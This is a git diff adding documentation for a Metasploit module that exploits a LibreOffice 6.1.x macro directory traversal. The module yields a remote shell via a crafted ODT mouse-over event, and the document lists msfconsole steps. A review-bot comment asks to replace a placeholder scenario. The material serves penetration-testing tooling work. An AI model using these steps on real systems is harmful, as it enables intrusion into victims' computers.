added most of documentation
parent
391e7cf8ef
commit
da0c0d7d3f
|
@ -0,0 +1,41 @@
|
|||
## Description
|
||||
|
||||
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.4.1` that enables remote code execution.
|
||||
Note: `6.0.x` versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
|
||||
lack of ability to pass arguments.
|
||||
|
||||
LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
|
||||
to them. A macro can be tied to a program event by including the script that contains the macro and the function
|
||||
name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
|
||||
Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
|
||||
path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
|
||||
that passes arguments to `os.system`, allowing RCE.
|
||||
|
||||
This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
|
||||
4. Do: ```set FILENAME <name>```
|
||||
5. Do: ```set LHOST <ip>```
|
||||
6. Do: ```set LPORT <port>```
|
||||
7. Do: ```run```
|
||||
8. Move the generated file to the target
|
||||
9. Open the file with a vulnerable version of LibreOffice
|
||||
10. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Version of software and OS as applicable
|
||||
|
||||
```
|
||||
msf > use module_name
|
||||
msf auxiliary(module_name) > set POWERLEVEL >9000
|
||||
msf auxiliary(module_name) > exploit
|
||||
```
|
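Review bot: The Scenarios section at the end of this hunk is still the unfilled documentation template. Its heading reads `### Version of software and OS as applicable`, and the console block uses `use module_name` and `set POWERLEVEL >9000` under an `auxiliary(module_name)` prompt, none of which belongs to this module. Replace it with a real console session for `exploit/multi/fileformat/libreoffice_macro_exec` against a named LibreOffice version and OS from the `v6.1.0-6.1.4.1` range, using the options from the Verification Steps (`FILENAME`, `LHOST`, `LPORT`) and showing the resulting session. Since the Verification Steps tell the user to set `FILENAME`, a short Options section describing it would also help.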